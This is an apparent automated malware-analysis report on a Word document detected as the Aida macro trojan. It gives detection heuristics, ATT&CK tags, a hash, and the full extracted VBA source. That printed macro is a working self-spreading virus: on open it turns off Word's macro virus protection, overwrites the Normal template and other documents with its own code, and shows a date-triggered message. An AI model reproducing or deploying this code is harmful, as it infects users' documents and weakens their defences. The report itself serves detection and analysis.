MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a malicious VBA macro. The macro is designed to infect other documents and includes a payload. The ClamAV detection identifies it as 'Doc.Trojan.Aida-1', suggesting a known trojan family, but specific IOCs for payload delivery are not present in the provided evidence.
Heuristics 3
- ClamAV: Doc.Trojan.Aida-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Aida-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1822 bytes |

SHA-256: 50f2c802413cfcde9c6377ff96f0e4e32f5a6a5b578c8923937dbf0d862a2f82

Detection: ClamAV: Doc.Trojan.Aida-1

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
---------------------------------------------------------------
Virus name: WM97/2K.Aida aka Macro.Word97.Aida
Virus author: e [ax] / EBVL / VXI
Virus description:
- Infection method: SIM [String Infection Method]
- Polymorphic: no
- Encryption: no
- Payload: yes
---------------------------------------------------------------
'Aida
Private Sub Document_Open(): With Options: Const nula = 0
    .VirusProtection = nula
End With: Dim a, b, c, d
a = Strings.RTrim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _
    ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines))
With NormalTemplate.VBProject.VBComponents(1).CodeModule
    c = .Lines(1, 1)
    If c <> "'Aida" Then
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents(1) _
            .CodeModule.CountOfLines
        .InsertLines 1, a
    End If
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
    d = .Lines(1, 1)
    If d <> "'Aida" Then
        .DeleteLines 1, ActiveDocument.VBProject.VBComponents(1) _
            .CodeModule.CountOfLines
        .InsertLines 1, a
End If: End With
If Day(Now()) = 14 And Month(Now()) = 9 Then
    With Selection
        .Font.Bold = True: .Font.Color = wdColorViolet
        .Font.Size = 26: .Font.Emboss = True
        .Font.Animation = wdAnimationSparkleText
        .Font.Shadow = True: .ParagraphFormat.Alignment = wdAlignParagraphCenter
        Selection.Text = "Aida: Where ever You are, You are only one that I loved truely!"
    End With
End If
'WM97/2K.Aida by e[ax]
End Sub
```